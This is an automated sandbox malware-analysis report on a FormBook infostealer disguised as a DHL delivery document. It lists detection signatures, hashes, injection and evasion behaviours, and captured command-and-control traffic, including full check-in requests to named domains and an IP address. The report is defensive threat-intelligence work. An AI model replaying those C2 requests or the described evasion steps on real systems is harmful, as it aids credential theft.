Windows Analysis Report
DHL_Delivery Documents.exe

Overview

General Information

Sample name: DHL_Delivery Documents.exe
Analysis ID: 1446732
MD5: 9c930da2ac186c1f945a7bc74aa491ed
SHA1: 3b24459060ab8590b7c550d34bd0243cbade3e2a
SHA256: 25bbd4a45d4d02d8bacdf482696505ab302ad8591b5e06da57481f7098324f9e
Tags: DHLexeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: DHL_Delivery Documents.exe ReversingLabs: Detection: 55%
Yara detected FormBook
Source: Yara match File source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: DHL_Delivery Documents.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: DHL_Delivery Documents.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: DHL_Delivery Documents.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3278494163.000000000060E000.00000002.00000001.01000000.0000000A.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3278640060.000000000060E000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: wntdll.pdbUGP source: DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2632462016.0000000002882000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2634170956.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: DHL_Delivery Documents.exe, DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, setx.exe, 00000012.00000003.2632462016.0000000002882000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2634170956.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: setx.pdbGCTL source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279344083.0000000001228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: setx.pdb source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279344083.0000000001228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: JeWB.pdbSHA256 source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr
Source: Binary string: JeWB.pdb source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_0042BF20 FindFirstFileW,FindNextFileW,FindClose, 18_2_0042BF20
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\setx.exe Code function: 4x nop then xor eax, eax 18_2_00419720
Source: C:\Windows\SysWOW64\setx.exe Code function: 4x nop then pop edi 18_2_0041E19F

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49710 -> 103.48.135.8:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.214.17 172.67.214.17
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ew0m/?Urf=R9oUCj0Kr0tjZSdhKcVG72tknPUSe2YfdfzFTAWqH1uH1Z8SvVf85mUnaA3f99ILEbWrEuJ+fmKqJVRYQbENh1wm0L+Vjxgcu0XuSfZ61wplFH4xX6XBL/wdg7Pf2vzXJQ==&pP=fPyhqn_HwdI HTTP/1.1Host: www.uzonedich.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0eyj/?Urf=xbMFueOYBXYurIwiepFnO71qLlyP3ujEHyf23sFAywtga3bqBhIKPev0K8adiimIvdV9j6fOUj2Pc2CkptCWxRwbiV0KWskIok5o/u5VAK+QdqKfe3RHCloueJvNBgPjzg==&pP=fPyhqn_HwdI HTTP/1.1Host: www.alexbruma.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic DNS traffic detected: DNS query: www.bookingshop01.top
Source: global traffic DNS traffic detected: DNS query: www.uzonedich.com
Source: global traffic DNS traffic detected: DNS query: www.7egiy1.cfd
Source: global traffic DNS traffic detected: DNS query: www.alexbruma.com
Source: global traffic DNS traffic detected: DNS query: www.prospin.click
Source: unknown HTTP traffic detected: POST /0eyj/ HTTP/1.1Host: www.alexbruma.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.alexbruma.comReferer: http://www.alexbruma.com/0eyj/Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 204User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 55 72 66 3d 38 5a 6b 6c 74 72 53 34 42 45 45 4d 34 4c 59 49 55 62 6c 2b 4f 75 68 73 49 46 72 5a 6e 71 36 4b 41 32 48 55 36 72 35 44 2f 69 49 53 46 6d 58 69 49 31 77 36 4d 50 6a 6f 4d 4f 6e 68 7a 6b 75 61 67 61 30 37 72 71 65 52 55 6e 43 49 5a 58 2b 4c 30 2f 2b 77 78 31 63 45 69 31 4d 66 5a 72 52 55 34 77 70 51 71 64 52 63 58 71 6d 54 51 64 4b 62 43 6d 73 4f 50 48 6b 6c 66 63 33 6c 64 78 75 4f 6f 31 58 62 55 74 52 4a 42 65 76 31 2b 53 55 6b 4e 72 53 66 78 45 52 63 70 30 58 75 38 77 63 4f 55 42 46 4e 41 36 30 63 51 52 4f 53 4f 76 33 7a 31 37 56 4c 6a 63 75 4a 68 4f 6f 4e 52 59 4b 70 63 43 72 57 41 52 34 3d Data Ascii: Urf=8ZkltrS4BEEM4LYIUbl+OuhsIFrZnq6KA2HU6r5D/iISFmXiI1w6MPjoMOnhzkuaga07rqeRUnCIZX+L0/+wx1cEi1MfZrRU4wpQqdRcXqmTQdKbCmsOPHklfc3ldxuOo1XbUtRJBev1+SUkNrSfxERcp0Xu8wcOUBFNA60cQROSOv3z17VLjcuJhOoNRYKpcCrWAR4=
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 23 May 2024 18:29:06 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:29:30 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTDzKzRHGF6T7c3wPmmJUP2aLUqZYFsOZH7jrvhqEFg4rJXjwQjj0XGOOna9U8sTe6Jfo2gh2biqAlIveAApqbQ8W65HFqOR1o9%2BqFbFwKlsqfbziKo4ndIRZW%2BAJVQIb8%2B3hA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88871ca27ba97cac-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: adL=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~b90
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:29:33 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyCJTmDV9ptbaS1LmXnX3s2wST%2FMbCNKmJzEUCj3PwPKcLPZaBEUBJQ7wSP9BeU1CH%2Bvb%2BvjgLgkMolS3mre3FWg86VlHduzeGggAamCEeRTfjFc1Uuq5uE8gviAp2%2BYQDLwXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88871cb238350c8a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 62 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b8L=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~90
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:29:35 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N2WnHi2%2Fo01hPAdXMSd%2BMF9RsM2LjNCZc931bGtsT0%2BpaQ9liOpp4p1QAGFrE6%2BJ%2B%2F0GmQF0%2BrXcPteoLI74c2xDdEFGBLHQ21583ib450RLHFXQmKPbBNCNGS3sWZ2m9TndGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88871cc21cd58c45-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: adL=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~b90
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:29:38 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=goUQgH9ohKt1fmph30M6OlTfSSoEVX%2BnI%2BjIrBrD%2F3AN%2BT5WbfBSA7l9RjOMhkuzkRCPVlWXzuEnxV3Aurtf3H7jwG3Z4%2BH55oS6ywv69uZWnVIYB2k2LS0mkZzUWjnXkfzZKw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88871cd1ee21423f-EWRalt-svc: h3=":443"; ma=86400Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 65 79 6a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0eyj/ was not found on this server.</p></body></html>0
Source: DHL_Delivery Documents.exe, 00000000.00000002.2080507854.0000000002E6E000.00000004.00000800.00020000.00000000.sdmp, YybGLWQSx.exe, 00000009.00000002.2305807020.00000000024D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr String found in binary or memory: http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.Resources
Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3282139682.0000000004CE1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.alexbruma.com
Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3282139682.0000000004CE1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.alexbruma.com/0eyj/
Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: setx.exe, 00000012.00000002.3278866707.000000000066F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: setx.exe, 00000012.00000003.2891319373.00000000074A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
.NET source code contains very large strings
Source: DHL_Delivery Documents.exe, BufferingPage.cs Long String: Length: 150953
Source: YybGLWQSx.exe.0.dr, BufferingPage.cs Long String: Length: 150953
Source: 18.2.setx.exe.320cd08.2.raw.unpack, BufferingPage.cs Long String: Length: 150953
